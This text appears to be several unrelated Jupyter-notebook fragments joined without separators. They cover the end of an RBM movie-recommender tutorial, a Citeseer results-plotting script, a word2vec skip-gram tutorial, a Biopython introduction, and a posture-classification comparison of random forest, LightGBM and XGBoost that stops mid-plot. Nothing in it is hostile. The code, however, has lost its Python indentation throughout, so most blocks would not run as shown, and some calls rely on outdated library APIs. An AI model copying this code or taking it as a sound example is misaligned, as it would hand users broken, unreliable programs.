v0 = inputUser
print(v0)
v0.shape
v0test = tf.zeros([visibleUnits], tf.float32)
v0test.shape
#Feeding in the user and reconstructing the input
hh0 = tf.nn.sigmoid(tf.matmul([v0], W) + hb)
vv1 = tf.nn.sigmoid(tf.matmul(hh0, tf.transpose(W)) + vb)
rec = vv1
tf.maximum(rec,1)
for i in vv1:
print(i)
```
We can then list the 20 most recommended movies for our mock user by sorting it by their scores given by our model.
```
scored_movies_df_mock = movies_df[movies_df['MovieID'].isin(user_rating_df.columns)]
scored_movies_df_mock = scored_movies_df_mock.assign(RecommendationScore = rec[0])
scored_movies_df_mock.sort_values(["RecommendationScore"], ascending=False).head(20)
```
So, how do we recommend the movies that the user has not watched yet?
Now, we can find all the movies that our mock user has watched before:
```
movies_df_mock = ratings_df[ratings_df['UserID'] == mock_user_id]
movies_df_mock.head()
```
In the next cell, we merge all the movies that our mock user has watched with the predicted scores based on their historical data:
```
#Merging movies_df with ratings_df by MovieID
merged_df_mock = scored_movies_df_mock.merge(movies_df_mock, on='MovieID', how='outer')
```
Let's sort it and take a look at the first 20 rows:
```
merged_df_mock.sort_values(["RecommendationScore"], ascending=False).head(20)
```
As you can see, there are some movies that user has not watched yet and has high score based on our model. So, we can recommend them to the user.
This is the end of the tutorial. If you want, you can try changing the parameters in the code: adding more units to the hidden layer, changing the loss function, or something else, to see if anything changes. Optimization settings can also be adjusted; the number of epochs, the size of K, and the batch size are all interesting numbers to explore.
Does the model perform better? Does it take longer to compute?
Thank you for reading this notebook. Hopefully, you now have a little more understanding of the RBM model, its applications and how it works with TensorFlow.
<hr>
## Want to learn more?
You can use __Watson Studio__ to run these notebooks faster with bigger datasets. __Watson Studio__ is IBM’s leading cloud solution for data scientists, built by data scientists. With Jupyter notebooks, RStudio, Apache Spark and popular libraries pre-packaged in the cloud, __Watson Studio__ enables data scientists to collaborate on their projects without having to install anything. Join the fast-growing community of __Watson Studio__ users today with a free account at [Watson Studio](http://ibm.biz/WatsonStudioRBM). This is the end of this lesson. Thank you for reading this notebook, and good luck on your studies.
### Thank you for completing this exercise!
Notebook created by: <a href = "https://ca.linkedin.com/in/saeedaghabozorgi">Saeed Aghabozorgi</a>, Gabriel Garcez Barros Sousa
Updated to TF 2.X by <a href="https://ca.linkedin.com/in/nilmeier"> Jerome Nilmeier</a><br />
Added to IBM Developer by <a href=https://www.linkedin.com/in/fawazsiddiqi/> Mohammad Fawaz Siddiqi </a> <br/>
<hr>
Copyright © 2020 [Cognitive Class](https://cocl.us/DX0108EN_CC). This notebook and its source code are released under the terms of the [MIT License](https://bigdatauniversity.com/mit-license/).
```
import pickle as pk
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.patches as mpatches
import os
import csv
# EDS_files = [
# 'cora_sampling_method=EDS_K_sparsity=100_results.p',
# 'cora_sampling_method=EDS_K_sparsity=10_results.p',
# 'cora_sampling_method=EDS_K_sparsity=5_results.p' ]
Greedy_files = [
'citeseer_sampling_method=Greedy_K_sparsity=100_label_balance=Greedy_noise=0.01_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=100_label_balance=Greedy_noise=100_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=100_label_balance=Greedy_noise=1_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=10_label_balance=Greedy_noise=0.01_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=10_label_balance=Greedy_noise=100_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=10_label_balance=Greedy_noise=1_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=5_label_balance=Greedy_noise=0.01_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=5_label_balance=Greedy_noise=100_results.p',
'citeseer_sampling_method=Greedy_K_sparsity=5_label_balance=Greedy_noise=1_results.p']
max_files = ['citeseer_sampling_method=MaxDegree_maxdegree_results.p']
random_file = ['citeseer_sampling_method=Random_random_results.p']
def open_files(files):
file_content = []
for file in files:
try:
with open(file, 'rb') as f:
file_content.append(pk.load(f, encoding='latin1'))
except Exception as e:
print(e)
print("No " + file)
return file_content
# eds_results = open_files(EDS_files)
geedy_results = open_files(Greedy_files)
max_results = open_files(max_files)
random_results = open_files(random_file)
def results_to_lines(results,sampling_title):
lines = []
for result in results:
line = result['results']
x = []
y = []
var = []
for point in line:
x.append(point[1])
y.append(point[2])
var.append(point[3])
lines.append((x,y,var,result['info']))
csvData = [[point[1],point[2],point[3]]for point in line ]
file_name = sampling_title +"_"+ result['info']['params']['params']['dataset']
if 'K_sparsity' in result['info']:
file_name = file_name+"_"+str(result['info']['K_sparsity'])
if 'noise' in result['info']:
file_name = file_name+"_"+str(result['info']['noise'])
file_name+=".csv"
print(file_name)
with open(file_name, 'w') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(csvData)
csvFile.close()
return lines
random_ref_line = results_to_lines(random_results, "Random")[0]
def plot(title, save_file,lines, label_name = None):
plt.errorbar(random_ref_line[0],random_ref_line[1],yerr=random_ref_line[2],alpha = 0.7,color = 'r',label="Random sampling",fmt='o-')
for line in lines:
if label_name is not None:
plt.errorbar(line[0],line[1],yerr=line[2],alpha = 0.5,label=label_name+":"+str(line[3][label_name]),fmt='o-')
else:
plt.errorbar(line[0],line[1],yerr=line[2],alpha = 0.5,fmt='o-')
plt.legend(loc=4)
plt.grid(True)
plt.savefig(os.path.join('../report_citeseer',save_file), bbox_inches="tight", dpi = 300)
#plot("EDS sampling","EDS_sampling_K_100.jpg",results_to_lines(eds_results)[0:1],'K_sparsity')
#results_to_lines(geedy_results,"Greedy")
# The EDS plots below require eds_results, whose creation is commented out above
# plot("EDS sampling","EDS_sampling_K10.jpg",results_to_lines(eds_results, "EDS")[1:2],'K_sparsity')
# plot("EDS sampling","EDS_sampling_K5.jpg",results_to_lines(eds_results, "EDS")[2:3],'K_sparsity')
plot("Greedy sampling, K sparsity = 100 ","Greedy_K100_sampling.jpg",results_to_lines(geedy_results[0:3],"Greedy"),'noise')
plot("Greedy sampling, K sparsity = 10 ","Greedy_K10_sampling.jpg",results_to_lines(geedy_results[3:6],"Greedy"),'noise')
plot("Greedy sampling, K sparsity = 5 ","Greedy_K5_sampling.jpg",results_to_lines(geedy_results[6:9],"Greedy"),'noise')
plot("Max degree sampling","Max_sampling.jpg",results_to_lines(max_results,"Max"))
```
# **Neural Word Embedding**
> **Word2Vec, Continuous Bag of Words (CBOW)**
> **Word2Vec, Skip-gram with negative sampling (SGNS)**
> **Key idea: the Distributional Hypothesis**
> Goal: predict the context words for a given target word
# **How to implement the Skip-gram Algorithm** (this simple version uses the full softmax rather than negative sampling):
1. Data preprocessing
2. Hyperparameters
3. Training Data
4. Model Fitting
5. Inference/prediction on test samples
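Steps 1–3 above boil down to sliding a window over each sentence and pairing every target word with its neighbors. A plain-Python sketch (the sentence and window size below are illustrative, not from the notebook's corpus):

```python
# Toy skip-gram pair generation: pair each target word with every word in its window
sentence = "natural language processing works well".split()
window = 2  # two words on each side (illustrative choice)
pairs = []
for i, target in enumerate(sentence):
    for j in range(max(0, i - window), min(len(sentence), i + window + 1)):
        if j != i:
            pairs.append((target, sentence[j]))
print(pairs[:3])
```

Each pair becomes one training example: the target is the input and the context word is the label to predict.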
### **Main Class**
```
from collections import defaultdict
import numpy as np
class word2vec():
def __init__(self):
self.n = hyperparameters['n']
self.learningrate = hyperparameters['learning_rate']
self.epochs = hyperparameters['epochs']
self.windowsize = hyperparameters['window_size']
def word2onehot(self, word):
word_vector = np.zeros(self.vocabulary_count)
word_index = self.word_index[word]
word_vector[word_index] = 1
return word_vector
def generate_training_data(self, setting, corpus):
word_counts = defaultdict(int)
# print(word_counts)
for row in corpus:
for token in row:
word_counts[token] +=1
#print(word_counts)
self.vocabulary_count = len(word_counts.keys())
#print(self.vocabulary_count)
self.words_list = list(word_counts.keys())
#print(self.words_list)
self.word_index = dict((word, i) for i, word in enumerate(self.words_list))
#print(self.word_index)
self.index_word = dict((i, word) for i, word in enumerate(self.words_list))
#print(self.index_word)
training_data = []
for sentence in corpus:
sentence_length = len(sentence)
for i , word in enumerate(sentence):
word_target = self.word2onehot(sentence[i])
#print(word_target)
word_context = []
for j in range(i - self.windowsize, i + self.windowsize + 1):
if j !=i and j <= sentence_length - 1 and j >= 0:
word_context.append(self.word2onehot(sentence[j]))
# print(word_context)
training_data.append([word_target, word_context])
        return np.array(training_data, dtype=object)  # dtype=object because the rows are ragged (variable context lengths)
    def model_training(self, training_data):
        self.w1 = np.random.uniform(-1, 1, (self.vocabulary_count, self.n))
        self.w2 = np.random.uniform(-1, 1, (self.n, self.vocabulary_count))
        for i in range(0, self.epochs):
            for word_target, word_context in training_data:
                h, u, y_pred = self.forward_pass(word_target)
                # sum the prediction error over every context word, then update the weights
                error = np.sum([np.subtract(y_pred, word) for word in word_context], axis=0)
                self.backprop(error, h, word_target)
    def backprop(self, error, h, x):
        # gradient-descent step on both weight matrices
        dl_dw2 = np.outer(h, error)
        dl_dw1 = np.outer(x, np.dot(self.w2, error))
        self.w1 = self.w1 - (self.learningrate * dl_dw1)
        self.w2 = self.w2 - (self.learningrate * dl_dw2)
def forward_pass(self, x):
h = np.dot(self.w1.T, x)
u = np.dot(self.w2.T, h)
y_pred= self.softmax(u)
return h, u, y_pred
def softmax(self, x):
e = np.exp(x - np.max(x))
return e / e.sum(axis=0)
def word_vector(self, word):
word_index = self.word_index[word]
word_vector = self.w1[word_index]
return word_vector
    def similar_vectors(self, word, n):
        vw1 = self.word_vector(word)
        word_similar = {}
        for i in range(self.vocabulary_count):
            vw2 = self.w1[i]
            theta_num = np.dot(vw1, vw2)
            theta_denom = np.linalg.norm(vw1) * np.linalg.norm(vw2)
            # cosine similarity between the query vector and every row of w1
            word_similar[self.index_word[i]] = theta_num / theta_denom
        words_sorted = sorted(word_similar.items(), key=lambda item: item[1], reverse=True)
        for similar_word, similarity in words_sorted[:n]:
            print(similar_word, similarity)
```
### **1. Data Preprocessing**
```
# Define the mini corpus
document = "A combination of Machine Learning and Natural Language Processing works well"
# Tokenizing and build a vocabulary
corpus = [[]]
for token in document.split():
corpus[0].append(token.lower())
print(corpus)
```
### **2. Hyperparameters**
```
hyperparameters = {
'window_size': 2, #it covers two words left and two words right
'n': 11, # dimension of word embedding
'epochs': 40, # number of training epochs
'learning_rate': 0.01, # a coefficient for updating weights
}
```
### **3. Generate Training Data**
```
# we need to create one-hot vector based on our given corpus
# 1 [target(a)], [context(combination, of)] == [10000000000],[01000000000][00100000000]
# instance
w2v = word2vec()
training_data = w2v.generate_training_data(hyperparameters, corpus)
# print(training_data)
```
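The one-hot encoding used by `word2onehot` can be illustrated on its own; the three-word vocabulary below is just an example, not the notebook's full vocabulary:

```python
import numpy as np

# Minimal one-hot encoder over a toy vocabulary
vocab = ["a", "combination", "of"]
word_index = {w: i for i, w in enumerate(vocab)}

def one_hot(word):
    v = np.zeros(len(vocab))
    v[word_index[word]] = 1.0
    return v

print(one_hot("of"))  # -> [0. 0. 1.]
```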
### **4. Model Training**
```
w2v.model_training(training_data)
```
### **5. Model Prediction**
```
vector = w2v.word_vector("works")
print(vector)
```
### **Finding Similar Words**
```
w2v.similar_vectors("works", 5)
```
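`similar_vectors` ranks words by cosine similarity between embedding rows; the measure itself reduces to a few lines of NumPy (the vectors below are arbitrary examples):

```python
import numpy as np

def cosine(u, v):
    # cosine similarity: dot product normalized by the vector magnitudes
    return np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))

a = np.array([1.0, 0.0])
b = np.array([0.0, 1.0])
print(cosine(a, a))  # identical direction -> 1.0
print(cosine(a, b))  # orthogonal -> 0.0
```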
# Introduction to BioPython
```
# Load Biopython library & Functions
import Bio
from Bio import SeqIO
from Bio.Seq import Seq, MutableSeq
from Bio.Seq import transcribe, back_transcribe, translate, complement, reverse_complement
# Check Biopython version
Bio.__version__
```
## Sequence Operations
```
# Sequence
seq = Seq("GGACCTGGAACAGGCTGAACCCTTTATCCACCTCTCTCCAATTATACCTATCATCCTAACTTCTCAGTGGACCTAACAATCTTCTCCCTTCATCTAGCAGGAGTC")
# Alphabet (note: the alphabet attribute was removed in Biopython 1.78+, so this only works on older versions)
seq.alphabet
# Check type
type(seq.alphabet)
# Find a sub-sequence: returns the position of the first match, or -1 if absent
seq.find("ATC")
seq.find("ATGC")
# Number of `A`
seq.count("A")
# Number of `C`
seq.count("C")
# Number of `T`
seq.count("T")
# Number of `G`
seq.count("G")
# K-mer analysis, K = 2 ("AA" dimer)
seq.count("AA")
# K-mer analysis, K = 3 ("AAA" trimer); note that count() is non-overlapping
seq.count("AAA")
# Count frequency of nucleotides
from collections import Counter
freq = Counter(seq)
print(freq)
# Reverse
print(f'RefSeq: {seq}')
rev = str(seq[::-1])
print(f'RevSeq: {rev}')
# Complement
print(f'RefSeq: {seq}')
com = seq.complement()
print(f'ComSeq: {com}')
# Reverse complement
print(f'RefSeq: {seq}')
rev_com = seq.reverse_complement()
print(f'RevCom: {rev_com}')
# Transcription(DNA ==> RNA)
print(f'DNA: {seq}')
rna = seq.transcribe()
print(f'RNA: {rna}')
# Back Transcription(RNA ==> DNA)
print(f'RNA: {rna}')
dna = rna.back_transcribe()
print(f'DNA: {dna}')
# Translation(DNA ==> Protein)
print(f'DNA: {seq}')
prt = seq.translate()
print(f'Protein: {prt}')
# Let's verify the protein length
len(seq)
# Remainder when split into codons (0 means the length is a multiple of 3)
len(seq) % 3
# Number of codons
len(seq) / 3
# Now verify the protein length
len(prt)
# Translation(DNA ==> Protein) Stop translation when found stop codon
print(f'DNA: {seq}')
prt = seq.translate(to_stop=True)
print(f'Protein: {prt}')
# Translation(DNA ==> Protein) for Mitochondrial DNA
print(f'DNA: {seq}')
prt = seq.translate(to_stop=True, table=2)
print(f'Protein: {prt}')
```
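A common statistic derived from the base counts above is GC content; it can be computed with the same `count` calls. A plain-string sketch (the short fragment below is illustrative) that works with or without Biopython, since `Seq` mimics the string API:

```python
# GC content: percentage of G and C bases in a sequence
dna = "GGACCTGGAACAGGCTGAACC"  # a short example fragment
gc_percent = (dna.count("G") + dna.count("C")) * 100.0 / len(dna)
print(round(gc_percent, 1))  # prints 61.9
```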
## Handling Files
```
for seq_record in SeqIO.parse("../data/den1.fasta", "fasta"):
ID = seq_record.id
seqs = seq_record.seq[:100]
rep = repr(seq_record)
length = len(seq_record)
# ID
print(ID)
# Sequence
print(seqs)
# Representation
print(rep)
# Length
print(length)
# Every third nucleotide starting at the first codon position
seqs[0::3]
# Every third nucleotide starting at the second codon position
seqs[1::3]
# Every third nucleotide starting at the third codon position
seqs[2::3]
# Sequence Length Comparison
seq1 = Seq("TTGTGGCCGCTCAGATCAGGCAGTTTAGGCTTA")
seq2 = Seq("ATTTATAGAAATGTGGTTATTTCTTAAGCATGGC")
seq1 == seq2
# Mutable sequence
mut_seq = MutableSeq("TTGTGGCCGCTCAGATCAGGCAGTTTAGGCTTA")
print(f'MutSeq: {mut_seq}')
mut_seq[5] = "C"  # item assignment works because the sequence is mutable
print(mut_seq)
mut_seq.remove("T")
print(mut_seq)
mut_seq.reverse()
print(mut_seq)
!wget http://d28rh4a8wq0iu5.cloudfront.net/ads1/data/SRR835775_1.first1000.fastq
# Working with Fastq files
for record in SeqIO.parse("SRR835775_1.first1000.fastq", "fastq"):
print(record)
print(record.seq)
print(record.letter_annotations['phred_quality'])
# Flatten the per-read quality lists into one list of scores before plotting
quals = [q for record in SeqIO.parse("SRR835775_1.first1000.fastq", "fastq") for q in record.letter_annotations['phred_quality']]
import matplotlib.pyplot as plt
plt.hist(quals, bins=10)
plt.title("Distribution of Phred Quality Scores")
plt.xlabel("Phred Quality Score")
plt.ylabel("Count")
plt.show()
sequences = [record.seq for record in SeqIO.parse("SRR835775_1.first1000.fastq", "fastq")]
sequences[:100]
```
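The `phred_quality` values above come from the ASCII quality line of each FASTQ record; in Sanger/Illumina 1.8+ encoding each score is the character code minus 33. A minimal decoder (the quality string below is made up):

```python
# Decode a FASTQ quality string (Phred+33) into integer scores
qual_str = "II?5+"
phred = [ord(c) - 33 for c in qual_str]
print(phred)  # [40, 40, 30, 20, 10]
```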
# Import Package
```
import math
import datetime
import numpy as np
import pandas as pd
from entropy import *
from collections import Counter
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from scipy.interpolate import interp1d
import random
import joblib
import sklearn
from sklearn import metrics
import sklearn.model_selection
from xgboost.sklearn import XGBClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import KFold
from sklearn import svm
import lightgbm as lgb
from lightgbm.sklearn import LGBMClassifier
from sklearn.pipeline import Pipeline
# from sklearn.externals import joblib
from sklearn.metrics import confusion_matrix
from sklearn.preprocessing import label_binarize
from sklearn.multiclass import OneVsRestClassifier
from numpy import interp  # scipy.interp was removed; np.interp has the same signature
from sklearn.metrics import roc_auc_score
from itertools import cycle
from sklearn.metrics import roc_curve, auc
from sklearn.metrics import accuracy_score
import datetime
from sklearn.model_selection import ShuffleSplit
import scipy.io as sio
```
# Load Dataset
```
matfn = 'posture_6_data.mat'
data = sio.loadmat(matfn)
trainSet = data['x_train']
testSet = data['x_test']
trainLabel = data['y_train']
testLabel = data['y_test']
trainSet = np.array(trainSet )
testSet = np.array(testSet )
trainLabel = np.array(trainLabel).ravel()
testLabel = np.array(testLabel ).ravel()
className = ['no motion', 'sit & stand', 'walk', 'run', 'turn left', 'turn right']
# replace label with string
trainLabel = [className[i] for i in trainLabel]
testLabel = [className[i] for i in testLabel ]
print("trainSet", trainSet.shape)
print("testSet ", testSet.shape)
# print("trainLabel", trainLabel.shape)
# print("testLabel ", testLabel.shape)
```
# Random Forest
```
rf= RandomForestClassifier(random_state=0, n_estimators=1000, max_depth=5, n_jobs=4, class_weight="balanced")
starttime = datetime.datetime.now()
rf.fit(trainSet, trainLabel)
endtime = datetime.datetime.now()
print("training time:", endtime - starttime)
starttime = datetime.datetime.now()
rfResult = rf.predict(testSet)
endtime = datetime.datetime.now()
print("testing time:", (endtime - starttime))
# print(rfResult)
# save the model
joblib.dump(rf, "model/rf_model.m")
from sklearn.metrics import f1_score
print("F-score: {0:.2f}".format(f1_score(testLabel, rfResult, average='micro')))
print("the accuracy is:", np.mean(rfResult == testLabel))
lw = 2
proba = rf.predict_proba(testSet)
testLabel_bi = label_binarize(testLabel, classes=np.unique(testLabel))  # labels are strings, so binarize against their sorted unique values (matches the predict_proba column order)
# print(testLabel_bi.shape)
rfResult_bi = label_binarize(rfResult, classes=np.unique(testLabel))
# print(rfResult_bi)
n_classes = 6
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
    # print(testLabel_bi[:, i])
    # print(proba[:, i])
fpr[i], tpr[i], _ = roc_curve(testLabel_bi[:, i], proba[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# print(fpr)
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(testLabel_bi.ravel(), proba.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
#######
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
# print(all_fpr)
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure(figsize=(5, 5))
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC of Random Forest')
plt.legend(loc="lower right")
plt.savefig('figure/rf_roc.png')
plt.show()
```
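The macro-average block above interpolates every per-class ROC curve onto a common FPR grid before averaging the TPRs. The mechanics on two toy curves (all curve points below are made up):

```python
import numpy as np

# Two per-class ROC curves (toy values)
fpr_a, tpr_a = np.array([0.0, 0.5, 1.0]), np.array([0.0, 0.8, 1.0])
fpr_b, tpr_b = np.array([0.0, 0.25, 1.0]), np.array([0.0, 0.6, 1.0])

# Common grid of every observed FPR value, then average the interpolated TPRs
all_fpr = np.unique(np.concatenate([fpr_a, fpr_b]))  # grid: 0, 0.25, 0.5, 1
mean_tpr = (np.interp(all_fpr, fpr_a, tpr_a) + np.interp(all_fpr, fpr_b, tpr_b)) / 2
print(mean_tpr)
```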
# plot_learning_curve function
```
from sklearn.model_selection import learning_curve
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
plt.figure()
plt.title(title)
    # ylim sets the minimum and maximum y values of the plot
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid()
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="aquamarine")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="dodgerblue")
plt.plot(train_sizes, train_scores_mean, 'o-', color="aquamarine",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="dodgerblue",
label="Cross-validation score")
plt.legend(loc="best")
plt.savefig('figure/'+title+'.png')
return plt
```
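`plot_learning_curve` averages the fold scores returned by `learning_curve` along axis 1 and shades ±1 standard deviation around the mean. That reduction in isolation (the scores below are toy numbers):

```python
import numpy as np

# Rows = training sizes, columns = CV folds (toy scores)
train_scores = np.array([[0.90, 0.80],
                         [0.95, 0.85]])
mean = np.mean(train_scores, axis=1)  # average across folds, per training size
std = np.std(train_scores, axis=1)    # spread across folds, per training size
print(mean)
print(std)
```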
# Learning Curve
```
X = trainSet
y = trainLabel
# print(X.shape)
# print(y.shape)
title = "Learning Curve of Random Forest"
cv = ShuffleSplit(n_splits=20, test_size=0.2, random_state=0)
plot_learning_curve(rf, title, X, y, (0.85, 1.01), cv=cv, n_jobs=4)
# Confusion matrix
con_mat = confusion_matrix(testLabel, rfResult)
con_mat_norm = con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis]  # normalize each row
con_mat_norm = np.around(con_mat_norm, decimals=2)
# === plot ===
plt.figure(figsize=(5, 5))
sns.heatmap(con_mat_norm, annot=True, cmap='Blues')
plt.ylim(0, 6)
plt.xlabel('Predicted labels')
plt.ylabel('True labels')
plt.title('Confusion Matrix of Random Forest')
# save the figure
plt.savefig('figure/rf_confusion_matrix.png')
plt.show()
```
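The normalization step above divides every confusion-matrix row by its row sum, so each row shows per-class recall fractions rather than raw counts. A minimal example (the counts are invented):

```python
import numpy as np

con = np.array([[8, 2],
                [1, 9]])
# Divide each row by its total so every row sums to 1
con_norm = con.astype(float) / con.sum(axis=1)[:, np.newaxis]
print(con_norm)  # rows: [0.8, 0.2] and [0.1, 0.9]
```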
# LGBMClassifier
```
lgbm = LGBMClassifier(objective = 'multiclass', boosting_type = 'goss', num_leaves = 10, max_depth= -1, n_estimators =50, learning_rate = 0.3, subsample_for_bin = 800, n_jobs=4)
starttime = datetime.datetime.now()
lgbm.fit(trainSet, trainLabel)
endtime = datetime.datetime.now()
print('training time:', (endtime - starttime))
starttime = datetime.datetime.now()
lgbmResult = lgbm.predict(testSet)
endtime = datetime.datetime.now()
print('predicting time:', (endtime - starttime))
# save the model
joblib.dump(lgbm, 'model/lgbm.model')
from sklearn.metrics import f1_score
print("F-score: {0:.2f}".format(f1_score(testLabel, lgbmResult, average='micro')))
print("the accuracy is:", np.mean(lgbmResult == testLabel))
proba = lgbm.predict_proba(testSet)
testLabel_bi = label_binarize(testLabel, classes=np.unique(testLabel))  # string labels; np.unique matches the sorted predict_proba column order
lgbmResult_bi = label_binarize(lgbmResult, classes=np.unique(testLabel))
n_classes = 6
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = roc_curve(testLabel_bi[:, i], proba[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(testLabel_bi.ravel(), proba.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
#######
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
print(all_fpr)
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure(figsize=(5, 5))
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=lw)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('ROC of LightGBM')
plt.legend(loc="lower right")
plt.savefig('figure/lgbm_roc.png')
plt.show()
X = trainSet
y = trainLabel
title = "Learning Curve of LGBMClassifier"
cv = ShuffleSplit(n_splits=20, test_size=0.2, random_state=0)
plot_learning_curve(lgbm, title, X, y, (0.6, 1.01), cv=cv, n_jobs=4)
plt.show()
con_mat = confusion_matrix(testLabel, lgbmResult)
con_mat_norm = con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis]  # normalize each row
con_mat_norm = np.around(con_mat_norm, decimals=2)
# === plot ===
plt.figure(figsize=(5, 5))
sns.heatmap(con_mat_norm, annot=True, cmap='Blues')
plt.ylim(0, 6)
plt.title('Confusion Matrix of LGBM')
plt.xlabel('Predicted labels')
plt.ylabel('True labels')
plt.savefig('figure/lgbm_confusion_matrix.png')
plt.show()
```
# XGBoost
```
xgb = XGBClassifier(random_state=0,n_estimators=100,scale_pos_weight=10,learning_rate=0.1,max_depth=6,subsample=0.8,min_child_weight=10)
starttime = datetime.datetime.now()
xgb.fit(trainSet, trainLabel)
endtime = datetime.datetime.now()
print('training time:', (endtime - starttime))
starttime = datetime.datetime.now()
xgbResult = xgb.predict(testSet)
endtime = datetime.datetime.now()
print('predicting time:', (endtime - starttime))
# save the model
joblib.dump(xgb, 'model/xgb.model')
from sklearn.metrics import f1_score
print("F-score: {0:.2f}".format(f1_score(testLabel, xgbResult, average='micro')))
print("the accuracy is:", np.mean(xgbResult == testLabel))
proba = xgb.predict_proba(testSet)
testLabel_bi = label_binarize(testLabel, classes=np.unique(testLabel))  # string labels; np.unique matches the sorted predict_proba column order
n_classes = 6
# Compute ROC curve and ROC area for each class
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
#print(testLabel[:, i])
#print(proba[:, i])
fpr[i], tpr[i], _ = roc_curve(testLabel_bi[:, i], proba[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(testLabel_bi.ravel(), proba.ravel())
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
#######
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
print(all_fpr)
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure(figsize=(5, 5))
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
colors = cycle(['aqua', 'darkorange', 'cornflowerblue'])
for i, color in zip(range(n_classes), colors):
plt.plot(fpr[i], tpr[i], color=color, lw=lw,
label='ROC curve of class {0} (area = {1:0.2f})'
